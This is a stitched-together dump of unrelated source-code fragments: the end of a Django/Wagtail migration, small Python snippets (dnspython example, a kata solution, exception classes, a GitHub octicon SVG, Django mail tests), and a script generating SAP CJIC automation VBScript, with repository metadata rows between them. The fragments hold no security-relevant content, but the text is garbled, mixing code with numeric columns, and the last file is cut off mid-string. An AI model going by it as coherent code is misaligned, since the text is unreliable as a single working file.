('section_content', wagtail.core.fields.StreamField([('text', wagtail.core.blocks.RichTextBlock()), ('partners', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('name', wagtail.core.blocks.CharBlock(blank=True, max_length=25)), ('link', wagtail.core.blocks.CharBlock(blank=True, max_length=255)), ('logo', wagtail.images.blocks.ImageChooserBlock())])))], blank=True)),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='IndexBlurbES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('section_name', models.CharField(blank=True, max_length=50)),
('section_content', wagtail.core.fields.StreamField([('text', wagtail.core.blocks.RichTextBlock()), ('partners', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('name', wagtail.core.blocks.CharBlock(blank=True, max_length=25)), ('link', wagtail.core.blocks.CharBlock(blank=True, max_length=255)), ('logo', wagtail.images.blocks.ImageChooserBlock())])))], blank=True)),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.RemoveField(
model_name='indexblurb',
name='article',
),
migrations.RenameField(
model_name='homepage',
old_name='title_tip_drugs',
new_name='title_lead_en',
),
migrations.RenameField(
model_name='homepage',
old_name='title_tip_me',
new_name='title_lead_es',
),
migrations.AddField(
model_name='homepage',
name='title_tip_drugs_en',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='homepage',
name='title_tip_drugs_es',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='homepage',
name='title_tip_me_en',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='homepage',
name='title_tip_me_es',
field=models.CharField(blank=True, max_length=255),
),
migrations.DeleteModel(
name='IndexBlurb',
),
migrations.AddField(
model_name='indexblurbes',
name='article',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='index_sections_es', to='home.HomePage'),
),
migrations.AddField(
model_name='indexblurben',
name='article',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='index_sections_en', to='home.HomePage'),
),
]
| 42.543478 | 400 | 0.602197 | 396 | 3,914 | 5.780303 | 0.247475 | 0.067278 | 0.081695 | 0.078637 | 0.75841 | 0.75841 | 0.75841 | 0.75841 | 0.75841 | 0.6872 | 0 | 0.019689 | 0.260347 | 3,914 | 91 | 401 | 43.010989 | 0.770984 | 0.011497 | 0 | 0.623529 | 1 | 0 | 0.135764 | 0.005948 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.070588 | 0 | 0.105882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e7c976d4f2a066a6a8d1ba80dfb73b2421211f0b | 27 | py | Python | database/__init__.py | markmelnic/Carsen-Logic | 7a43f465e61f2e8713d04395877dfaf00a0f663e | [
"MIT"
] | 1 | 2021-09-05T10:50:42.000Z | 2021-09-05T10:50:42.000Z | database/__init__.py | markmelnic/Carsen-Crawler | 6f5a7b7b7ba7cdad04c0dd30a53d17239dda6965 | [
"MIT"
] | null | null | null | database/__init__.py | markmelnic/Carsen-Crawler | 6f5a7b7b7ba7cdad04c0dd30a53d17239dda6965 | [
"MIT"
] | 4 | 2020-10-31T14:09:01.000Z | 2022-01-13T20:48:37.000Z | from database.db import DB
| 13.5 | 26 | 0.814815 | 5 | 27 | 4.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
99dd7ad7b483482fcd178a90958f624794511bd0 | 44 | py | Python | models/contextuals/__init__.py | datactivist/dataoutai | a1db230a31e78d17cd1c79daa8c13a508d493f9f | [
"MIT"
] | 1 | 2022-01-19T19:06:18.000Z | 2022-01-19T19:06:18.000Z | models/contextuals/__init__.py | datactivist/dataoutai | a1db230a31e78d17cd1c79daa8c13a508d493f9f | [
"MIT"
] | 4 | 2021-12-01T19:44:54.000Z | 2022-01-12T15:48:53.000Z | models/contextuals/__init__.py | datactivist/dataoutai | a1db230a31e78d17cd1c79daa8c13a508d493f9f | [
"MIT"
] | null | null | null | from .sbert import ContextualEmbeddingModel
| 22 | 43 | 0.886364 | 4 | 44 | 9.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
821736f98cf14f5ce1e5196c206fb3028207846c | 90 | py | Python | samples/sample_enum_names.py | NobuyukiInoue/Example_dnspython | 550bce804315862a0050ef9b1cae304ca45481c0 | [
"MIT"
] | 1 | 2019-07-08T11:32:03.000Z | 2019-07-08T11:32:03.000Z | samples/sample_enum_names.py | NobuyukiInoue/Example_dnspython | 550bce804315862a0050ef9b1cae304ca45481c0 | [
"MIT"
] | null | null | null | samples/sample_enum_names.py | NobuyukiInoue/Example_dnspython | 550bce804315862a0050ef9b1cae304ca45481c0 | [
"MIT"
] | null | null | null | import dns.e164
n = dns.e164.from_e164("+1 555 1212")
print(n)
print(dns.e164.to_e164(n))
| 18 | 37 | 0.711111 | 19 | 90 | 3.263158 | 0.526316 | 0.33871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.283951 | 0.1 | 90 | 4 | 38 | 22.5 | 0.481481 | 0 | 0 | 0 | 0 | 0 | 0.122222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
416f853bde5380a07f5b880a51657938dcb3bce4 | 390 | py | Python | python/6_kyu/data_reverse.py | CommonLouis/CodeWars_Solutions | f325c12effbd361905027864848e06ce07ec941e | [
"MIT"
] | null | null | null | python/6_kyu/data_reverse.py | CommonLouis/CodeWars_Solutions | f325c12effbd361905027864848e06ce07ec941e | [
"MIT"
] | null | null | null | python/6_kyu/data_reverse.py | CommonLouis/CodeWars_Solutions | f325c12effbd361905027864848e06ce07ec941e | [
"MIT"
] | null | null | null | """
Michael Persico
Oct.09, 2021
Data Reverse
https://www.codewars.com/kata/569d488d61b812a0f7000015
"""
def data_reverse(data):
return sum([data[i:i + 8] for i in range(0,len(data), 8)][::-1], [])
if __name__ == "__main__":
print(data_reverse([1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,0,1,0,1,0,1,0])) # [1,0,1,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1]
| 30 | 158 | 0.605128 | 102 | 390 | 2.215686 | 0.27451 | 0.19469 | 0.252212 | 0.283186 | 0.283186 | 0.283186 | 0.283186 | 0.283186 | 0.252212 | 0.234513 | 0 | 0.264205 | 0.097436 | 390 | 12 | 159 | 32.5 | 0.377841 | 0.417949 | 0 | 0 | 0 | 0 | 0.03653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.25 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
41704865996d49e48cc2b6df3d95c21449a8431d | 26 | py | Python | graphgallery/functional/edge_level/__init__.py | dongzizhu/GraphGallery | c65eab42daeb52de5019609fe7b368e30863b4ae | [
"MIT"
] | 1 | 2020-07-29T08:00:32.000Z | 2020-07-29T08:00:32.000Z | graphgallery/functional/edge_level/__init__.py | dongzizhu/GraphGallery | c65eab42daeb52de5019609fe7b368e30863b4ae | [
"MIT"
] | null | null | null | graphgallery/functional/edge_level/__init__.py | dongzizhu/GraphGallery | c65eab42daeb52de5019609fe7b368e30863b4ae | [
"MIT"
] | null | null | null | from .transform import *
| 13 | 25 | 0.730769 | 3 | 26 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 26 | 1 | 26 | 26 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
68c0c7bebfb8165c02b9c3567ba1f0baaf50e693 | 113 | py | Python | cvpl-xml/xml/exceptions.py | robinsax/canvas-plugin-multirepo | 20fd6a3cc42af5f2cde73e3b100d3edeb4e50c01 | [
"Apache-2.0"
] | null | null | null | cvpl-xml/xml/exceptions.py | robinsax/canvas-plugin-multirepo | 20fd6a3cc42af5f2cde73e3b100d3edeb4e50c01 | [
"Apache-2.0"
] | null | null | null | cvpl-xml/xml/exceptions.py | robinsax/canvas-plugin-multirepo | 20fd6a3cc42af5f2cde73e3b100d3edeb4e50c01 | [
"Apache-2.0"
] | null | null | null | # coding utf-8
'''
Exceptions.
'''
class XMLSyntaxError(Exception): pass
class ConversionError(Exception): pass | 14.125 | 38 | 0.752212 | 12 | 113 | 7.083333 | 0.75 | 0.305882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01 | 0.115044 | 113 | 8 | 38 | 14.125 | 0.84 | 0.221239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
6bc85338b7ea5c26c66d401329c612c7d5219cff | 696 | py | Python | octicons16px/file_diff.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | 1 | 2021-01-28T06:47:39.000Z | 2021-01-28T06:47:39.000Z | octicons16px/file_diff.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null | octicons16px/file_diff.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null |
OCTICON_FILE_DIFF = """
<svg class="octicon octicon-file-diff" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M2.75 1.5a.25.25 0 00-.25.25v12.5c0 .138.112.25.25.25h10.5a.25.25 0 00.25-.25V4.664a.25.25 0 00-.073-.177l-2.914-2.914a.25.25 0 00-.177-.073H2.75zM1 1.75C1 .784 1.784 0 2.75 0h7.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0113.25 16H2.75A1.75 1.75 0 011 14.25V1.75zm7 1.5a.75.75 0 01.75.75v1.5h1.5a.75.75 0 010 1.5h-1.5v1.5a.75.75 0 01-1.5 0V7h-1.5a.75.75 0 010-1.5h1.5V4A.75.75 0 018 3.25zm-3 8a.75.75 0 01.75-.75h4.5a.75.75 0 010 1.5h-4.5a.75.75 0 01-.75-.75z"></path></svg>
"""
| 116 | 665 | 0.675287 | 181 | 696 | 2.585635 | 0.447514 | 0.064103 | 0.08547 | 0.089744 | 0.215812 | 0.173077 | 0.055556 | 0 | 0 | 0 | 0 | 0.499203 | 0.099138 | 696 | 5 | 666 | 139.2 | 0.247209 | 0 | 0 | 0 | 0 | 0.333333 | 0.961095 | 0.227666 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6bcac64f89c55cdecb4c0c5c5a004a3278b7a9d2 | 27 | py | Python | config/__init__.py | AlexanderFengler/LAN_scripts | 2f79f0c85c6301bba9858536376a36ba01e558a0 | [
"MIT"
] | 1 | 2021-07-22T01:19:41.000Z | 2021-07-22T01:19:41.000Z | config/__init__.py | AlexanderFengler/LAN_scripts | 2f79f0c85c6301bba9858536376a36ba01e558a0 | [
"MIT"
] | null | null | null | config/__init__.py | AlexanderFengler/LAN_scripts | 2f79f0c85c6301bba9858536376a36ba01e558a0 | [
"MIT"
] | null | null | null | from .config_utils import * | 27 | 27 | 0.814815 | 4 | 27 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6bffc2408603e9afd2d388e619e914416ec56b66 | 168 | py | Python | queen.py | omerihtizaz/chess-AI | 97a18f30b64ac502117c1424861f997e078737ff | [
"MIT"
] | null | null | null | queen.py | omerihtizaz/chess-AI | 97a18f30b64ac502117c1424861f997e078737ff | [
"MIT"
] | null | null | null | queen.py | omerihtizaz/chess-AI | 97a18f30b64ac502117c1424861f997e078737ff | [
"MIT"
] | null | null | null | from bishop import *
from rook import *
def getQueenMovements(board, player):
return joinList(getBishopMovements(board, player), getRookMovements(board, player))
| 24 | 87 | 0.779762 | 18 | 168 | 7.277778 | 0.666667 | 0.251908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130952 | 168 | 6 | 88 | 28 | 0.89726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
d411a7aee4a973de451dbd7f702376ad7056ea8c | 73 | py | Python | src/po/GithubPO.py | d9nchik/selenium | a4363a4a4ae0c58a9b1ae94923bf3e25ec65ced4 | [
"MIT"
] | null | null | null | src/po/GithubPO.py | d9nchik/selenium | a4363a4a4ae0c58a9b1ae94923bf3e25ec65ced4 | [
"MIT"
] | null | null | null | src/po/GithubPO.py | d9nchik/selenium | a4363a4a4ae0c58a9b1ae94923bf3e25ec65ced4 | [
"MIT"
] | 1 | 2021-05-26T15:10:50.000Z | 2021-05-26T15:10:50.000Z | import src.po.DefaultPO as dpo
class GithubPO(dpo.DefaultPO):
pass
| 12.166667 | 30 | 0.739726 | 11 | 73 | 4.909091 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178082 | 73 | 5 | 31 | 14.6 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
d422938e811ee5f3aafa6ce77665e43c85c8ba06 | 167 | py | Python | tensorcv/__init__.py | Hourout/tensorcv | 620559ee90921e036c8a84877d806a5c21010511 | [
"Apache-2.0"
] | 8 | 2018-12-06T05:02:29.000Z | 2021-08-25T07:09:29.000Z | tensorcv/__init__.py | Hourout/keras-cv | 620559ee90921e036c8a84877d806a5c21010511 | [
"Apache-2.0"
] | null | null | null | tensorcv/__init__.py | Hourout/keras-cv | 620559ee90921e036c8a84877d806a5c21010511 | [
"Apache-2.0"
] | 4 | 2018-12-06T05:02:32.000Z | 2019-06-04T11:15:39.000Z | from tensorcv import Classification
from tensorcv import image
from tensorcv import data
from tensorcv import losses
__version__ = '0.2.0'
__author__ = 'JinQing Lee'
| 20.875 | 35 | 0.808383 | 23 | 167 | 5.521739 | 0.565217 | 0.377953 | 0.566929 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020979 | 0.143713 | 167 | 7 | 36 | 23.857143 | 0.867133 | 0 | 0 | 0 | 0 | 0 | 0.095808 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d453c9afec5b861ee835938e9120505c34a04ac5 | 10,064 | py | Python | paloma/tests/mail.py | piquadrat/paloma | 7c621e81e48b38099f71cdff02b621efb0f499d1 | [
"Apache-2.0"
] | null | null | null | paloma/tests/mail.py | piquadrat/paloma | 7c621e81e48b38099f71cdff02b621efb0f499d1 | [
"Apache-2.0"
] | null | null | null | paloma/tests/mail.py | piquadrat/paloma | 7c621e81e48b38099f71cdff02b621efb0f499d1 | [
"Apache-2.0"
] | null | null | null | import os
from paloma import Mail, TemplateMail
from django.core import mail
from django.test.utils import override_settings
from .testcase import TestCase
TEMPLATE_DIRS = (os.path.join(os.path.abspath(os.path.dirname(__file__)),
'templates'), )
@override_settings(DEFAULT_FROM_EMAIL='default@example.com',
DEFAULT_FROM_NAME='Default sender')
class MailTestCase(TestCase):
"""Test case for :class:`Mail`.
"""
def assertSimple(self, sent, **kwargs):
self.assertEqual(sent.subject,
kwargs.pop('subject', 'Subject of the e-mail'))
self.assertEqual(sent.body, kwargs.pop('body', 'Body of the e-mail'))
from_email = kwargs.pop('from_email', 'default@example.com')
from_name = kwargs.pop('from_name', 'Default sender')
if from_name:
self.assertEqual(sent.from_email, '%s <%s>' % (from_name,
from_email))
else:
self.assertEqual(sent.from_email, from_email)
self.assertEqual(len(sent.to), 1)
self.assertEqual(sent.to[0], kwargs.pop('to', 'test@example.com'))
html_alternatives = filter(lambda a: a[1] == 'text/html',
sent.alternatives)
self.assertEqual(any(html_alternatives), 'html_body' in kwargs)
if 'html_body' in kwargs:
html_body = kwargs.pop('html_body')
actual_html_body, mime_type = html_alternatives[0]
self.assertEqual(html_body, actual_html_body)
def test_init__defaults_to_setting_for_from_email_and_from_name(self):
"""Mail().__init__(from_name=None, from_email=None) uses defaults
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
# Test with global.
with override_settings(DEFAULT_FROM_EMAIL='someone@example.com',
DEFAULT_FROM_NAME='Someone'):
m = TestMail()
self.assertEqual(m.from_email, 'someone@example.com')
self.assertEqual(m.from_name, 'Someone')
with self.assertMailsSent(1):
m.send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1],
from_email='someone@example.com',
from_name='Someone')
def test_send__respects_from_email_ivar_from_sent(self):
"""Mail().send(..) respects from_email instance variable
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
from_email = 'from@example.com'
# Test without global.
with override_settings(DEFAULT_FROM_EMAIL=None):
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_email='from@example.com')
# Test with global.
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_email='from@example.com')
def test_send__respects_from_name_ivar_from_sent(self):
"""Mail().send(..) respects from_name instance variable
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
from_name = 'Overridden'
# Test without global.
with override_settings(DEFAULT_FROM_NAME=None):
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_name='Overridden')
# Test with global.
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_name='Overridden')
def test_send__respects_subject(self):
"""Mail().send(..) respects subject argument
"""
class TestMail(Mail):
subject = 'Not this subject of the e-mail'
with self.assertMailsSent(1):
TestMail().send('test@example.com',
'Body of the e-mail',
subject='This is the subject')
self.assertSimple(mail.outbox[-1], subject='This is the subject')
def test_send__with_html_body(self):
"""Mail().send(..) with HTML body sends both plain text and HTML body
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
html_body = '<h1>HTML body of the e-mail</h1>'
with self.assertMailsSent(1):
TestMail().send('test@example.com',
'Body of the e-mail',
html_body)
self.assertSimple(mail.outbox[-1], html_body=html_body)
@override_settings(DEFAULT_FROM_EMAIL='default@example.com',
DEFAULT_FROM_NAME='Default sender',
TEMPLATE_DIRS=TEMPLATE_DIRS)
class TemplateMailTestCase(TestCase):
"""Test case for :class:`TemplateMail`.
"""
def assertSimple(self, sent, body, **kwargs):
self.assertEqual(sent.subject,
kwargs.pop('subject', 'Subject of the e-mail'))
self.assertEqual(sent.body, body)
from_email = kwargs.pop('from_email', 'default@example.com')
from_name = kwargs.pop('from_name', 'Default sender')
if from_name:
self.assertEqual(sent.from_email, '%s <%s>' % (from_name,
from_email))
else:
self.assertEqual(sent.from_email, from_email)
self.assertEqual(len(sent.to), 1)
self.assertEqual(sent.to[0], kwargs.pop('to', 'test@example.com'))
html_alternatives = filter(lambda a: a[1] == 'text/html',
sent.alternatives)
self.assertEqual(any(html_alternatives), 'html_body' in kwargs)
if 'html_body' in kwargs:
html_body = kwargs.pop('html_body')
actual_html_body, mime_type = html_alternatives[0]
self.assertEqual(html_body, actual_html_body)
def test_send__only_text_template(self):
"""TemplateMail(<only text template>).send(..) sends expected e-mail
"""
# Local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
text_template_name = 'test_mail.txt'
with self.assertMailsSent(1):
TestMail().send('test@example.com', {'a': 'in local context'})
self.assertSimple(mail.outbox[-1],
body=u'Test body.\n\nHas variable in local context.')
# Class context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
text_template_name = 'test_mail.txt'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com')
self.assertSimple(mail.outbox[-1],
body=u'Test body.\n\nHas variable in class context.')
# Class and local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
text_template_name = 'test_mail.txt'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com',
{'a': 'in local context'})
self.assertSimple(mail.outbox[-1],
body=u'Test body.\n\nHas variable in local context.')
def test_send__templated(self):
"""TemplateMail(<templated>).send(..) sends expected e-mail
"""
# Local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
subject_template_name = 'test_mail_subject.txt'
text_template_name = 'test_mail.txt'
html_template_name = 'test_mail.html'
with self.assertMailsSent(1):
TestMail().send('test@example.com', {'a': 'in local context'})
body_format = u'Test body.\n\nHas variable %s.'
html_body_format = u'''<html>
<body>
<p>Test body.</p>
<p>Has variable %s.</p>
</body>
</html>'''
self.assertSimple(
mail.outbox[-1],
subject=u'Test subject with variable in local context',
body=body_format % ('in local context'),
html_body=html_body_format % ('in local context')
)
# Class context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
subject_template_name = 'test_mail_subject.txt'
text_template_name = 'test_mail.txt'
html_template_name = 'test_mail.html'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com')
self.assertSimple(
mail.outbox[-1],
subject=u'Test subject with variable in class context',
body=body_format % ('in class context'),
html_body=html_body_format % ('in class context')
)
# Class and local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
subject_template_name = 'test_mail_subject.txt'
text_template_name = 'test_mail.txt'
html_template_name = 'test_mail.html'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com',
{'a': 'in local context'})
self.assertSimple(
mail.outbox[-1],
subject=u'Test subject with variable in local context',
body=body_format % ('in local context'),
html_body=html_body_format % ('in local context')
)
__all__ = (
'MailTestCase',
'TemplateMailTestCase',
)
| 37.552239 | 79 | 0.578498 | 1,148 | 10,064 | 4.898084 | 0.089721 | 0.042682 | 0.023475 | 0.039125 | 0.826427 | 0.773431 | 0.755469 | 0.741953 | 0.712075 | 0.697492 | 0 | 0.005134 | 0.303259 | 10,064 | 267 | 80 | 37.692884 | 0.796777 | 0.079591 | 0 | 0.681081 | 0 | 0 | 0.218529 | 0.006843 | 0 | 0 | 0 | 0 | 0.248649 | 1 | 0.048649 | false | 0 | 0.027027 | 0 | 0.145946 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2e19441bbe0130f7ead2d8dac701870d2d48b983 | 2,381 | py | Python | CJIC.py | LeandroPOliveira/SAP-Scripting | 8a0f50a1e14a9e1040300bbdefb671c917cc32e9 | [
"MIT"
] | null | null | null | CJIC.py | LeandroPOliveira/SAP-Scripting | 8a0f50a1e14a9e1040300bbdefb671c917cc32e9 | [
"MIT"
] | null | null | null | CJIC.py | LeandroPOliveira/SAP-Scripting | 8a0f50a1e14a9e1040300bbdefb671c917cc32e9 | [
"MIT"
] | null | null | null | # Importar o pacote pandas para trabalhar com arquivos excel
import pandas as pd
# Abrir arquivo de script gerado pelo SAP
arquivo = open('CJIC.vbs', 'a') # modo 'a' de append, insere novos dados no arquivo sem excluir os que estavam
# Abrir arquivo com os dados a serem lançados
dados = pd.read_excel('CJIC.xlsx', dtype=str)
# iterar sobre as linhas do arquivo excel e buscar os dados necessários para o script
for index, row in dados.iterrows():
# Adicionar os dados ao script
arquivo.write(f'''
session.findById("wnd[0]").maximize
session.findById("wnd[0]/tbar[0]/okcd").text = "CJIC"
session.findById("wnd[0]").sendVKey 0
session.findById("wnd[0]/usr/ctxtCN_PSPNR-LOW").text = "RSG.22.001.022.1.01.1"
session.findById("wnd[0]/usr/ctxtCN_ACTVT-LOW").text = ""
session.findById("wnd[0]/usr/ctxtP_DISVAR").text = "/IMOB_OBJETO"
session.findById("wnd[0]/usr/ctxtP_DISVAR").setFocus
session.findById("wnd[0]/usr/ctxtP_DISVAR").caretPosition = 12
session.findById("wnd[0]/tbar[1]/btn[8]").press
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").setCurrentCell -1,"POBID"
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").selectColumn "POBID"
session.findById("wnd[0]/tbar[1]/btn[29]").press
session.findById("wnd[1]/usr/ssub%_SUBSCREEN_FREESEL:SAPLSSEL:1105/ctxt%%DYN001-LOW").text = "7010083 0010"
session.findById("wnd[1]/usr/ssub%_SUBSCREEN_FREESEL:SAPLSSEL:1105/ctxt%%DYN001-LOW").caretPosition = 12
session.findById("wnd[1]/tbar[0]/btn[0]").press
